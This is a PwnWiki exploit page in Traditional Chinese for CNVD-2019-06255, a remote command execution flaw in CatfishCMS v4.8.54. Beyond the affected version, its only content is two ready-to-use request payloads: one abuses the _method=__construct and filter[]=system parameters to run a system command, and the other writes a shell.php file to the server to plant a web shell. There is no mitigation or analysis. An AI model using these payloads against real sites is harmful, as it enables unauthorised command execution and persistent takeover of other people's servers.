CNVD-2019-06255 CatfishCMS遠程命令執行漏洞

From PwnWiki

This page is a translated version of the page CNVD-2019-06255 CatfishCMS遠程命令執行漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎English • ‎español • ‎русский • ‎中文（中国大陆）‎ • ‎中文（台灣）‎ • ‎中文（繁體）‎

漏洞影響

v4.8.54

Payload

s=dir&_method=__construct&method=*&filter[]=system

s=echo "shell" >shell.php&filter[]=system&method=*&_method=__construct

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2019-06255_CatfishCMS遠程命令執行漏洞/zh-hant&oldid=6951"